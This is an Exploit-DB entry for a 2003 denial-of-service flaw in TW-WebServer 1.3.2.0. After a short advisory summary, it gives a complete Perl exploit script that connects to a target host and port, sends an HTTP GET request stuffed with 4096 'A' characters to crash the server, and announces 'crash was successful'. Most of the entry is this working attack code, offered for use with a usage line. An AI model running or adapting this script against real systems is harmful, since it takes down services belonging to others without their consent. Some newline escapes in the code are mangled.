https://www.exploit-db.com/exploits/22502

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/7368/info

It has been reported that TW-WebServer is prone to a denial of service vulnerability. Reportedly when an excessive quantity of data is sent to the TW-Webserver as part of a malicious HTTP GET request the server will fail.

Although unconfirmed, due to the nature of this vulnerability, an attacker may have the ability to supply and execute arbitrary code. 

#!/usr/bin/perl
#
# Twilight Utilities TW-WebServer/1,3,2,0 
#
# Vulnerable systems:
# TW-WebServer/1, 3, 2, 0
# 
# Written by badpack3t <[email protected]>
# For SP Research Labs
# 04/15/2003
# 
# www.security-protocols.com
# 
# usage: 
# perl sp-urfuqed.pl <target> <port>
#
# big ups 2: acidjazz, #havoc, regulate, cr0wn, mp, lopt, 
# aitek5, rab, #darknet, dvdman, bind, and whoever the f else.

use IO::Socket;
use strict;

print ".:."x 20; print "nTW-WebServer/1, 3, 2, 0 DoS, <[email protected]>n";
print ".:."x 20; print "nn";

if(!defined($ARGV[0] && $ARGV[1]))
{
   &usage;
}

my $host     = $ARGV[0];
my $def      = "A";
my $num	     = "4096";
my $port     = $ARGV[1];
my $urfuqed  = $def x $num;

my $tcpval   = getprotobyname('tcp');
my $serverIP = inet_aton($host);
my $serverAddr = sockaddr_in($ARGV[1], $serverIP);
my $protocol_name = "tcp";

my $iaddr    = inet_aton($host) 	   || die ("host was not found: $host");
my $paddr    = sockaddr_in($port, $iaddr)  || die ("you did something wrong stupid... exiting...");
my $proto    = getprotobyname('tcp')       || die ("cannot get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die ("socket could not open: $host");
connect(SOCK, $paddr) 			   || die ("cannot connect to: $host");

my $submit   = "GET $urfuqed HTTP/1.0rnrn";   
send(SOCK,$submit,0);
close(SOCK);

sub usage {die("nnUsage: perl $0 <target_host> <port>nn");}

print "n.:.:.:.:.:.:.:.:.:.:.:.";
print "ncrash was successful ~!n";
print ".:.:.:.:.:.:.:.:.:.:.:.n";